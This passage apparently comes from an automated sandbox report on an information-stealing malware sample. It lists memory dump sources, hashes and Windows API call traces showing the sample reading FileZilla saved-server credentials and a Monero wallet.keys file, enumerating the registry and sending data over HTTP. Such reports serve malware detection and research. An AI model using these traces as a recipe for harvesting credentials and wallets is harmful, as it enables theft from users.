                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4c1d014bec99a00a36b0d388d195b42a1eac706c33435ac608450508ca7345eb
                    • Instruction ID: a63416edb0f418e4cf072641a1572a597f16ff81aee9d1af5053595d3f2924f4
                    • Opcode Fuzzy Hash: 4c1d014bec99a00a36b0d388d195b42a1eac706c33435ac608450508ca7345eb
                    • Instruction Fuzzy Hash: CD61D1B39082149FE344AE28DC8677AB7E5EF58710F1B093DDAC5D3340EA7968158B87
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1b41cdc0cbf5fd2a68baabf784dfb21e1a5cd52bfa981ae2ca96f2d826adb020
                    • Instruction ID: 04d56ee636786282cb161d677817c5a5be1c6c379ffbc515794b3c664e718003
                    • Opcode Fuzzy Hash: 1b41cdc0cbf5fd2a68baabf784dfb21e1a5cd52bfa981ae2ca96f2d826adb020
                    • Instruction Fuzzy Hash: 6451F0F39082109BE318AF1AEC8477BFBE5EFD4760F16853DDAC983340E53949058696
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 3a78ab0960e147ea62ab178a861edccba462277a8ef5e582166af59d725dac30
                    • Instruction ID: 20e6a644cfcfcd8dd8939c29c3d1db01cf55435793a0883f0d4a377d7dcd7ae2
                    • Opcode Fuzzy Hash: 3a78ab0960e147ea62ab178a861edccba462277a8ef5e582166af59d725dac30
                    • Instruction Fuzzy Hash: 88415BF3E145248BE7145929EC08766BAD6DBD0730F2A853DDE8893784EC7E480682D5
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 2c39d754ec1135b39bb8c5949df7cc19cbddaa7ab486dc849ecf4ebfbd69648a
                    • Instruction ID: f4cab7aa385c4d1b4a0ca3c1a5fc0a80c42ab33deeff9a48bdd6423c48ac4e8e
                    • Opcode Fuzzy Hash: 2c39d754ec1135b39bb8c5949df7cc19cbddaa7ab486dc849ecf4ebfbd69648a
                    • Instruction Fuzzy Hash: DC41F5F3A086144FF3146E2CDC8972AB7E5EB48320F57463DDAD9E3384E97958058786
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                    • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                    • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                    • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                    APIs
                      • Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788
                      • Part of subcall function 00488DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00488E0B
                      • Part of subcall function 0048A920: lstrcpy.KERNEL32(00000000,?), ref: 0048A972
                      • Part of subcall function 0048A920: lstrcat.KERNEL32(00000000), ref: 0048A982
                      • Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905
                      • Part of subcall function 0048A9B0: lstrlen.KERNEL32(?,01238FF0,?,\Monero\wallet.keys,00490E17), ref: 0048A9C5
                      • Part of subcall function 0048A9B0: lstrcpy.KERNEL32(00000000), ref: 0048AA04
                      • Part of subcall function 0048A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0048AA12
                      • Part of subcall function 0048A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0048A7E6
                      • Part of subcall function 004799C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004799EC
                      • Part of subcall function 004799C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00479A11
                      • Part of subcall function 004799C0: LocalAlloc.KERNEL32(00000040,?), ref: 00479A31
                      • Part of subcall function 004799C0: ReadFile.KERNEL32(000000FF,?,00000000,0047148F,00000000), ref: 00479A5A
                      • Part of subcall function 004799C0: LocalFree.KERNEL32(0047148F), ref: 00479A90
                      • Part of subcall function 004799C0: CloseHandle.KERNEL32(000000FF), ref: 00479A9A
                      • Part of subcall function 00488E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00488E52
                    • GetProcessHeap.KERNEL32(00000000,000F423F,00490DBA,00490DB7,00490DB6,00490DB3), ref: 00480362
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00480369
                    • StrStrA.SHLWAPI(00000000,<Host>), ref: 00480385
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00490DB2), ref: 00480393
                    • StrStrA.SHLWAPI(00000000,<Port>), ref: 004803CF
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00490DB2), ref: 004803DD
                    • StrStrA.SHLWAPI(00000000,<User>), ref: 00480419
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00490DB2), ref: 00480427
                    • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00480463
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00490DB2), ref: 00480475
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00490DB2), ref: 00480502
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00490DB2), ref: 0048051A
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00490DB2), ref: 00480532
                    • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00490DB2), ref: 0048054A
                    • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00480562
                    • lstrcat.KERNEL32(?,profile: null), ref: 00480571
                    • lstrcat.KERNEL32(?,url: ), ref: 00480580
                    • lstrcat.KERNEL32(?,00000000), ref: 00480593
                    • lstrcat.KERNEL32(?,00491678), ref: 004805A2
                    • lstrcat.KERNEL32(?,00000000), ref: 004805B5
                    • lstrcat.KERNEL32(?,0049167C), ref: 004805C4
                    • lstrcat.KERNEL32(?,login: ), ref: 004805D3
                    • lstrcat.KERNEL32(?,00000000), ref: 004805E6
                    • lstrcat.KERNEL32(?,00491688), ref: 004805F5
                    • lstrcat.KERNEL32(?,password: ), ref: 00480604
                    • lstrcat.KERNEL32(?,00000000), ref: 00480617
                    • lstrcat.KERNEL32(?,00491698), ref: 00480626
                    • lstrcat.KERNEL32(?,0049169C), ref: 00480635
                    • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00490DB2), ref: 0048068E
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                    • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                    • API String ID: 1942843190-555421843
                    • Opcode ID: 305d2f78e3fe93e300bc5ebb22ec0b795915dc669d75dc7d004a77433daac028
                    • Instruction ID: bd8c10570c792efcb81e76d249e4ea09d8dcd7cad126e0e2c25c3f2cba19bf74
                    • Opcode Fuzzy Hash: 305d2f78e3fe93e300bc5ebb22ec0b795915dc669d75dc7d004a77433daac028
                    • Instruction Fuzzy Hash: 3AD141B1D10108ABDB04FBE1DD96EEE7739AF14304F50492EF102A6091DF7CAA59CB69
                    APIs
                      • Part of subcall function 0048A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0048A7E6
                      • Part of subcall function 004747B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00474839
                      • Part of subcall function 004747B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00474849
                      • Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788
                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004759F8
                    • StrCmpCA.SHLWAPI(?,0123E858), ref: 00475A13
                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00475B93
                    • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0123E7F8,00000000,?,0123A4F0,00000000,?,00491A1C), ref: 00475E71
                    • lstrlen.KERNEL32(00000000), ref: 00475E82
                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00475E93
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00475E9A
                    • lstrlen.KERNEL32(00000000), ref: 00475EAF
                    • lstrlen.KERNEL32(00000000), ref: 00475ED8
                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00475EF1
                    • lstrlen.KERNEL32(00000000,?,?), ref: 00475F1B
                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00475F2F
                    • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00475F4C
                    • InternetCloseHandle.WININET(00000000), ref: 00475FB0
                    • InternetCloseHandle.WININET(00000000), ref: 00475FBD
                    • HttpOpenRequestA.WININET(00000000,0123E778,?,0123E298,00000000,00000000,00400100,00000000), ref: 00475BF8
                      • Part of subcall function 0048A9B0: lstrlen.KERNEL32(?,01238FF0,?,\Monero\wallet.keys,00490E17), ref: 0048A9C5
                      • Part of subcall function 0048A9B0: lstrcpy.KERNEL32(00000000), ref: 0048AA04
                      • Part of subcall function 0048A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0048AA12
                      • Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905
                      • Part of subcall function 0048A920: lstrcpy.KERNEL32(00000000,?), ref: 0048A972
                      • Part of subcall function 0048A920: lstrcat.KERNEL32(00000000), ref: 0048A982
                    • InternetCloseHandle.WININET(00000000), ref: 00475FC7
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                    • String ID: "$"$------$------$------
                    • API String ID: 874700897-2180234286
                    • Opcode ID: efca1165f0294f7ef923cf3d86f9b0a1142c9142d640c9646f2890d99b166fab
                    • Instruction ID: f32e30f2691db6368a5935578667294b91eb73444db1b378987104bbd25aa1fb
                    • Opcode Fuzzy Hash: efca1165f0294f7ef923cf3d86f9b0a1142c9142d640c9646f2890d99b166fab
                    • Instruction Fuzzy Hash: E6122171820118AAEB15FBA1DC95FEE7338BF14704F5045AFF10662091DFB82A5ACF69
                    APIs
                      • Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788
                      • Part of subcall function 0048A9B0: lstrlen.KERNEL32(?,01238FF0,?,\Monero\wallet.keys,00490E17), ref: 0048A9C5
                      • Part of subcall function 0048A9B0: lstrcpy.KERNEL32(00000000), ref: 0048AA04
                      • Part of subcall function 0048A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0048AA12
                      • Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905
                      • Part of subcall function 00488B60: GetSystemTime.KERNEL32(00490E1A,0123A250,004905AE,?,?,004713F9,?,0000001A,00490E1A,00000000,?,01238FF0,?,\Monero\wallet.keys,00490E17), ref: 00488B86
                      • Part of subcall function 0048A920: lstrcpy.KERNEL32(00000000,?), ref: 0048A972
                      • Part of subcall function 0048A920: lstrcat.KERNEL32(00000000), ref: 0048A982
                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0047CF83
                    • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0047D0C7
                    • RtlAllocateHeap.NTDLL(00000000), ref: 0047D0CE
                    • lstrcat.KERNEL32(?,00000000), ref: 0047D208
                    • lstrcat.KERNEL32(?,00491478), ref: 0047D217
                    • lstrcat.KERNEL32(?,00000000), ref: 0047D22A
                    • lstrcat.KERNEL32(?,0049147C), ref: 0047D239
                    • lstrcat.KERNEL32(?,00000000), ref: 0047D24C
                    • lstrcat.KERNEL32(?,00491480), ref: 0047D25B
                    • lstrcat.KERNEL32(?,00000000), ref: 0047D26E
                    • lstrcat.KERNEL32(?,00491484), ref: 0047D27D
                    • lstrcat.KERNEL32(?,00000000), ref: 0047D290
                    • lstrcat.KERNEL32(?,00491488), ref: 0047D29F
                    • lstrcat.KERNEL32(?,00000000), ref: 0047D2B2
                    • lstrcat.KERNEL32(?,0049148C), ref: 0047D2C1
                    • lstrcat.KERNEL32(?,00000000), ref: 0047D2D4
                    • lstrcat.KERNEL32(?,00491490), ref: 0047D2E3
                      • Part of subcall function 0048A820: lstrlen.KERNEL32(00474F05,?,?,00474F05,00490DDE), ref: 0048A82B
                      • Part of subcall function 0048A820: lstrcpy.KERNEL32(00490DDE,00000000), ref: 0048A885
                    • lstrlen.KERNEL32(?), ref: 0047D32A
                    • lstrlen.KERNEL32(?), ref: 0047D339
                      • Part of subcall function 0048AA70: StrCmpCA.SHLWAPI(01239060,0047A7A7,?,0047A7A7,01239060), ref: 0048AA8F
                    • DeleteFileA.KERNEL32(00000000), ref: 0047D3B4
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                    • String ID:
                    • API String ID: 1956182324-0
                    • Opcode ID: 1e0bfbdc3d21719cfe82fbc4a5fadf863a4ca7c8155f73d7ba0f194cef0f349a
                    • Instruction ID: 932373735b0208a54a1d376726386cefe792610e5ef07ff2e84f2928986d67d8
                    • Opcode Fuzzy Hash: 1e0bfbdc3d21719cfe82fbc4a5fadf863a4ca7c8155f73d7ba0f194cef0f349a
                    • Instruction Fuzzy Hash: 0EE16FB1910108ABDB04FBA1DD96EEE7379AF14304F10455BF106A20A1DE7CAA59CB7A
                    APIs
                      • Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788
                      • Part of subcall function 0048A920: lstrcpy.KERNEL32(00000000,?), ref: 0048A972
                      • Part of subcall function 0048A920: lstrcat.KERNEL32(00000000), ref: 0048A982
                      • Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905
                      • Part of subcall function 0048A9B0: lstrlen.KERNEL32(?,01238FF0,?,\Monero\wallet.keys,00490E17), ref: 0048A9C5
                      • Part of subcall function 0048A9B0: lstrcpy.KERNEL32(00000000), ref: 0048AA04
                      • Part of subcall function 0048A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0048AA12
                    • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0123D4C8,00000000,?,0049144C,00000000,?,?), ref: 0047CA6C
                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0047CA89
                    • GetFileSize.KERNEL32(00000000,00000000), ref: 0047CA95
                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0047CAA8
                    • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0047CAD9
                    • StrStrA.SHLWAPI(?,0123D4E0,00490B52), ref: 0047CAF7
                    • StrStrA.SHLWAPI(00000000,0123D4F8), ref: 0047CB1E
                    • StrStrA.SHLWAPI(?,0123D8C0,00000000,?,00491458,00000000,?,00000000,00000000,?,01239130,00000000,?,00491454,00000000,?), ref: 0047CCA2
                    • StrStrA.SHLWAPI(00000000,0123D760), ref: 0047CCB9
                      • Part of subcall function 0047C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0047C871
                      • Part of subcall function 0047C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0047C87C
                    • StrStrA.SHLWAPI(?,0123D760,00000000,?,0049145C,00000000,?,00000000,01239210), ref: 0047CD5A
                    • StrStrA.SHLWAPI(00000000,01238F40), ref: 0047CD71
                      • Part of subcall function 0047C820: lstrcat.KERNEL32(?,00490B46), ref: 0047C943
                      • Part of subcall function 0047C820: lstrcat.KERNEL32(?,00490B47), ref: 0047C957
                      • Part of subcall function 0047C820: lstrcat.KERNEL32(?,00490B4E), ref: 0047C978
                    • lstrlen.KERNEL32(00000000), ref: 0047CE44
                    • CloseHandle.KERNEL32(00000000), ref: 0047CE9C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                    • String ID:
                    • API String ID: 3744635739-3916222277
                    • Opcode ID: 1d3239e68d4af6b02ca1a8cd2ebac696917befeba3ab7d3428659ee856a3fff3
                    • Instruction ID: c5600550a37edd5d3bf85b6176c9f3e2d262c8d48e4a681ee76ffcb5c6b7f945
                    • Opcode Fuzzy Hash: 1d3239e68d4af6b02ca1a8cd2ebac696917befeba3ab7d3428659ee856a3fff3
                    • Instruction Fuzzy Hash: E4E110B1800108ABDB14FBA5DC91FEE7779AF14304F40456FF10662191EF786A9ACB7A
                    APIs
                      • Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788
                    • RegOpenKeyExA.ADVAPI32(00000000,0123B328,00000000,00020019,00000000,004905B6), ref: 004883A4
                    • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00488426
                    • wsprintfA.USER32 ref: 00488459
                    • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0048847B
                    • RegCloseKey.ADVAPI32(00000000), ref: 0048848C
                    • RegCloseKey.ADVAPI32(00000000), ref: 00488499
                      • Part of subcall function 0048A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0048A7E6
                    Strings
                    Memory Dump Source
